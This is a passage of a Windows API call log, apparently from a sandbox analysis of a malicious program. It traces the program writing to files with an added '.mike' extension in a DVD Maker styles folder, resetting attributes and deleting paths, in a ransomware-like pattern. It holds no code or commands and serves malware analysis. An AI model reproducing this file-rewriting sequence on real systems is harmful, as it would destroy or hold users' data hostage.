lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", lpFilePart=0x0) returned 0x52 [0066.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", lpFilePart=0x0) returned 0x4d [0066.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.289] WriteFile (in: hFile=0x288, lpBuffer=0x21808d4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21808d4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", lpFilePart=0x0) returned 0x52 [0066.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.292] WriteFile (in: hFile=0x288, lpBuffer=0x2189324*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2189324*, lpNumberOfBytesWritten=0x2af074*=0xc60, lpOverlapped=0x0) returned 1 [0066.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.293] WriteFile (in: hFile=0x288, lpBuffer=0x218c578*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x218c578*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", lpFilePart=0x0) returned 0x52 [0066.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.294] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", lpFilePart=0x0) returned 0x52 [0066.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.294] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", dwFileAttributes=0x80) returned 0 [0066.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.295] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike", lpFilePart=0x0) returned 0x52 [0066.295] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png.mike")) returned 1 [0066.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.298] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", lpFilePart=0x0) returned 0x46 [0066.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.299] WriteFile (in: hFile=0x288, lpBuffer=0x21916c0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21916c0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.304] WriteFile (in: hFile=0x288, lpBuffer=0x21a4044*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21a4044*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.304] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.304] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.305] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0066.306] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.306] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.306] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png.mike")) returned 1 [0066.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.309] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.310] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.310] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", lpFilePart=0x0) returned 0x46 [0066.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.310] WriteFile (in: hFile=0x288, lpBuffer=0x21a9094*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21a9094*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.315] WriteFile (in: hFile=0x288, lpBuffer=0x21bb114*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21bb114*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.316] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0066.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike", lpFilePart=0x0) returned 0x4b [0066.317] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png.mike")) returned 1 [0066.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", lpFilePart=0x0) returned 0x4a [0066.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.321] WriteFile (in: hFile=0x288, lpBuffer=0x21c0254*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21c0254*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.324] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.326] WriteFile (in: hFile=0x288, lpBuffer=0x21d29c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21d29c8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.326] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.326] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.327] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0066.328] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.328] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike", lpFilePart=0x0) returned 0x4f [0066.328] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png.mike")) returned 1 [0066.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.331] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.331] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", lpFilePart=0x0) returned 0x44 [0066.331] WriteFile (in: hFile=0x288, lpBuffer=0x21d7a30*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d7a30*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.334] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.334] WriteFile (in: hFile=0x288, lpBuffer=0x21dd0d8*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21dd0d8*, lpNumberOfBytesWritten=0x2af074*=0x3d0, lpOverlapped=0x0) returned 1 [0066.336] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", lpFilePart=0x0) returned 0x49 [0066.336] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD 